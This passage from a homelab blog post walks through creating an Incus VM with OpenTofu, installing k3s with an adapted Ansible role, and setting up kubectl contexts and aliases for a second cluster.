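<pre tabindex="0"><code># Generate a SHA-512 crypt hash for the initial password
openssl passwd -6 'password123'
# Prints something like $6$&lt;salt&gt;$&lt;hash&gt;, which cloud-init can take instead of a text password
</code></pre>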
<p>I&rsquo;ve also got a small second profile, for creating hosts with disks:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_profile&#34; &#34;disk-vms&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk-vms&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${incus_storage_pool.local-dir.name}&#34;</span>
</span></span><span style="display:flex;"><span>      size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;20GB&#34;</span>
</span></span><span style="display:flex;"><span>      path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>These two profiles are separate because I will also need to test how my diskless
netboot setup works with Tinkerbell provisioning. And honestly, I&rsquo;ve got a bad
feeling about it. But that&rsquo;s for the future. &#x1f62c;</p>
<p>The last thing to do: Actually create the VM.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;incus_instance&#34; &#34;master&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;master&#34;</span>
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;virtual-machine&#34;</span>
</span></span><span style="display:flex;"><span>  image <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;images:ubuntu/24.04/cloud&#34;</span>
</span></span><span style="display:flex;"><span>  running <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  profiles <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;${incus_profile.base.name}&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">device</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;disk&#34;</span>
</span></span><span style="display:flex;"><span>    properties <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      pool <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${incus_storage_pool.local-dir.name}&#34;</span>
</span></span><span style="display:flex;"><span>      size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;50GB&#34;</span>
</span></span><span style="display:flex;"><span>      path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  config <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;limits.cpu&#34; <span style="color:#f92672">=</span> <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>    &#34;limits.memory&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;16GB&#34;</span>
</span></span><span style="display:flex;"><span>    &#34;cloud-init.user-data&#34; <span style="color:#f92672">=</span> <span style="color:#960050;background-color:#1e0010">&lt;&lt;-</span><span style="color:#66d9ef">EOT</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#cloud-config
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">hostname</span><span style="color:#960050;background-color:#1e0010">:</span> <span style="color:#66d9ef">master</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">EOT</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Nothing special about this config: it uses the previously discussed <code>base</code>
profile and adds a 50 GB disk to it. I&rsquo;ve configured it with 16 GB of RAM, similar
to the Pi 5 which will ultimately host the setup.</p>
<p>A single <code>tofu apply</code> later, I had the main VM up and running, ready for the k3s
install.</p>
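<p>Before pointing Ansible at the new VM, it is worth checking that it actually came
up and that cloud-init finished. A quick sketch of what that can look like; the
instance name matches the <code>master</code> resource above:</p>
<pre tabindex="0"><code># Show the instance, its state and the IP it got on the bridge
incus list master
# Run a command inside the guest to confirm that cloud-init is done
incus exec master -- cloud-init status --wait
</code></pre>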
<h2 id="setting-up-k3s">Setting up k3s</h2>
<p>Tinkerbell is very much a Kubernetes application. Plus, I had started thinking
that standardizing on deploying everything possible in Kubernetes would be a
good thing. So regardless of whether Tinkerbell ultimately gets deployed or not,
I want a Kubernetes cluster on my cluster master host. After looking through the
current offerings, I decided on <a href="https://k3s.io/">k3s</a> as the Kubernetes distro
to use. Mostly because it seems to be the standard. While I normally instinctively
reach for the &ldquo;vanilla&rdquo; version of everything, I already know that kubeadm is
not exactly friendly to single-node deployments.</p>
<p>For the deployment on the test VM, I adapted <a href="https://github.com/k3s-io/k3s-ansible/tree/master">this Ansible role</a>.
With my adaptations, the role&rsquo;s <code>tasks/main.yml</code> looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Populate service facts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.service_facts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">get k3s installed version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.command</span>: <span style="color:#ae81ff">k3s --version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">k3s_version_output</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">changed_when</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ignore_errors</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">set k3s installed version</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not ansible_check_mode and k3s_version_output.rc == 0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.set_fact</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">installed_k3s_version</span>: <span style="color:#e6db74">&#34;{{ k3s_version_output.stdout_lines[0].split(&#39; &#39;)[2] }}&#34;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download artifact only if needed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">not ansible_check_mode and ( k3s_version_output.rc != 0 or installed_k3s_version is version(k3s_version, &#39;&lt;&#39;) )</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">block</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download K3s install script</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ansible.builtin.get_url</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://get.k3s.io/</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">timeout</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/local/bin/k3s-install.sh</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Download K3s binary</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ansible.builtin.command</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">cmd</span>: <span style="color:#ae81ff">/usr/local/bin/k3s-install.sh</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">INSTALL_K3S_SKIP_START</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">INSTALL_K3S_VERSION</span>: <span style="color:#e6db74">&#34;{{ k3s_version }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">changed_when</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make config directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/etc/rancher/k3s&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Copy config file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;k3s-config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#e6db74">&#34;/etc/rancher/k3s/config.yaml&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0644&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">_server_config_result</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make data directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ data_dir }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Make volume directory</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;{{ volume_dir }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0755&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Copy K3s service file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#e6db74">&#34;k3s.service&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#e6db74">&#34;/etc/systemd/system/k3s.service&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#34;0644&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">service_file_single</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Restart K3s service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;] is defined</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;].state == &#39;running&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">service_file_single.changed or _server_config_result.changed</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k3s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">restarted</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Enable and check K3s service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts.services[&#39;k3s.service&#39;] is not defined or ansible_facts.services[&#39;k3s.service&#39;].state != &#39;running&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k3s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">daemon_reload</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>The nice thing about this role is that it can handle updates reasonably well.
It still feels a bit weird to use a bash script as part of the process, but it
looks like that&rsquo;s really the intended approach for deploying k3s. Worth noting
here is the very first task:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Populate service facts</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.service_facts</span>:
</span></span></code></pre></div><p>Without this, at least in my setup, later tasks that check <code>ansible_facts.services</code>
do not work, as Ansible does not gather service data by default.</p>
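<p>To see what this module actually gathers, it can also be run ad-hoc against a
host; the services end up under <code>ansible_facts.services</code>, keyed by unit name.
A quick sketch, with the host name being just a placeholder:</p>
<pre tabindex="0"><code># Run the module ad-hoc and inspect the gathered service facts
ansible master -m ansible.builtin.service_facts
# The output should contain an entry like "k3s.service": {"state": "running", ...}
</code></pre>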
<p>The role also needs some variables defined, which I do in <code>defaults/main.yml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">k3s_version</span>: <span style="color:#ae81ff">v1.33.1+k3s1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data_dir</span>: <span style="color:#e6db74">&#34;/srv/k3s/state&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">volume_dir</span>: <span style="color:#e6db74">&#34;/srv/k3s/volumes&#34;</span>
</span></span></code></pre></div><p>The <code>k3s.service</code> file is also taken from the role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-systemd" data-lang="systemd"><span style="display:flex;"><span><span style="color:#66d9ef">[Unit]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Description</span><span style="color:#f92672">=</span><span style="color:#e6db74">Lightweight Kubernetes</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Documentation</span><span style="color:#f92672">=</span><span style="color:#e6db74">https://k3s.io</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Wants</span><span style="color:#f92672">=</span><span style="color:#e6db74">network-online.target</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">After</span><span style="color:#f92672">=</span><span style="color:#e6db74">network-online.target</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">[Install]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">WantedBy</span><span style="color:#f92672">=</span><span style="color:#e6db74">multi-user.target</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">[Service]</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Type</span><span style="color:#f92672">=</span><span style="color:#e6db74">notify</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/default/%N</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/sysconfig/%N</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">EnvironmentFile</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/etc/systemd/system/k3s.service.env</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">KillMode</span><span style="color:#f92672">=</span><span style="color:#e6db74">process</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Delegate</span><span style="color:#f92672">=</span><span style="color:#e6db74">yes</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Having non-zero Limit*s causes performance problems due to accounting overhead</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># in the kernel. We recommend using cgroups to do container-local accounting.</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitNOFILE</span><span style="color:#f92672">=</span><span style="color:#e6db74">1048576</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitNPROC</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">LimitCORE</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">TasksMax</span><span style="color:#f92672">=</span><span style="color:#e6db74">infinity</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">TimeoutStartSec</span><span style="color:#f92672">=</span><span style="color:#e6db74">0</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">Restart</span><span style="color:#f92672">=</span><span style="color:#e6db74">always</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">RestartSec</span><span style="color:#f92672">=</span><span style="color:#e6db74">5s</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPre</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/sbin/modprobe br_netfilter</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStartPre</span><span style="color:#f92672">=</span><span style="color:#e6db74">-/sbin/modprobe overlay</span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">ExecStart</span><span style="color:#f92672">=</span><span style="color:#e6db74">/usr/local/bin/k3s server</span>
</span></span></code></pre></div><p>And then finally, there&rsquo;s the k3s config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tls-san</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;k3s.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#e6db74">&#34;192.0.2.100&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data-dir</span>: <span style="color:#e6db74">&#34;{{ data_dir }}&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">cluster-cidr</span>: <span style="color:#e6db74">&#34;10.42.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">service-cidr</span>: <span style="color:#e6db74">&#34;10.43.0.0/16&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">flannel-backend</span>: <span style="color:#e6db74">&#34;wireguard-native&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">default-local-storage-path</span>: <span style="color:#e6db74">&#34;{{ volume_dir }}&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">disable</span>: <span style="color:#e6db74">&#34;servicelb&#34;</span>
</span></span></code></pre></div><p>Nothing too special here either. I decided to keep k3s&rsquo; default <a href="https://github.com/rancher/local-path-provisioner/tree/master">local-storage provider</a>.
The reason is that I need this cluster to be as independent of any other
services as possible, because it&rsquo;s going to be the place where I deploy everything
that serves as the bedrock for the rest of the Homelab.</p>
<p>Besides that, the last notable action is disabling the <code>servicelb</code> load balancer
service. In short, this is k3s&rsquo; implementation of a simple handler for LoadBalancer
type k8s Services. I couldn&rsquo;t use it because DHCP packets never made
it to the Tinkerbell Pod. I will go into more detail about this in the next
post of the series.</p>
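<p>Both decisions are easy to verify on the running cluster. A quick check, sketched
with the default names k3s uses:</p>
<pre tabindex="0"><code># The local-path provisioner should show up as the default StorageClass
kubectl get storageclass
# With servicelb disabled, no svclb pods should show up anywhere
kubectl get pods -A | grep svclb
</code></pre>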
<p>And after an <code>ansible-playbook deployment.yml --limit master</code>, I had a fully
functional k3s cluster. It started up without any issue, deployed Traefik and
was ready for more workloads. I like how little hassle this was, and I find myself
agreeing with k3s&rsquo; claims of being a simple Kubernetes distribution. As far as such
things can be simple. &#x1f60f;</p>
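<p>For a quick first look at the fresh cluster, the kubectl bundled with k3s can be
used directly on the node, before any kubeconfig is copied anywhere. A small sketch:</p>
<pre tabindex="0"><code># k3s ships its own kubectl and knows where its kubeconfig lives
sudo k3s kubectl get nodes -o wide
sudo k3s kubectl -n kube-system get pods
</code></pre>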
<h2 id="cluster-connection-setups">Cluster connection setups</h2>
<p>Before I finish this post, I would like to talk a little bit about how I
configured access to the new k3s cluster, as it would be accessed from the same host
as my main cluster. I ended up going with the alias route, using kubectl&rsquo;s
<code>--context</code> parameter.</p>
<p>Let&rsquo;s first have a look at the updated <code>~/.kube/config</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">clusters</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;BASE64 encoded data here&gt;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k8s.example.com:6443</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-cluster</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>: <span style="color:#ae81ff">https://k3s.example.com:6443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certificate-authority-data</span>: <span style="color:#ae81ff">&lt;Different BASE64 encoded data here&gt;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">management-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">contexts</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">main-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">main-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">context</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">cluster</span>: <span style="color:#ae81ff">management-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">user</span>: <span style="color:#ae81ff">mgm-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mgm-admin@management-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">current-context</span>: <span style="color:#ae81ff">main-admin@main-cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">preferences</span>: {}
</span></span><span style="display:flex;"><span><span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">main-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">main-creds</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">mgm-admin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">client.authentication.k8s.io/v1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>: <span style="color:#ae81ff">pass</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">show</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">mgm-creds</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">interactiveMode</span>: <span style="color:#ae81ff">IfAvailable</span>
</span></span></code></pre></div><p>For more details on this config, and why <a href="https://www.passwordstore.org/">pass</a>
appears in it, have a look at <a href="https://blog.mei-home.net/posts/securing-k8s-credentials/">this post</a>.
Each cluster gets its own context definition, and each cluster has a different user.</p>
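<p>For completeness: kubectl itself can also list and switch between these contexts,
which is handy for one-off commands outside of the aliases shown next:</p>
<pre tabindex="0"><code># List all contexts from ~/.kube/config, the current one is marked with *
kubectl config get-contexts
# Run a single command against the management cluster without switching contexts
kubectl --context=mgm-admin@management-cluster get nodes
</code></pre>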
<p>The aliases for kubectl then look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>alias k<span style="color:#f92672">=</span>kubectl<span style="color:#ae81ff">\ </span>--context<span style="color:#f92672">=</span>main-admin@main-cluster
</span></span><span style="display:flex;"><span>alias k-master<span style="color:#f92672">=</span>kubectl<span style="color:#ae81ff">\ </span>--context<span style="color:#f92672">=</span>mgm-admin@management-cluster
</span></span></code></pre></div><p>So with <code>k</code>, I&rsquo;m getting my main cluster. I decided to keep the alias I had
originally created for the cluster, instead of renaming it to e.g. <code>k-main</code>. I&rsquo;ve
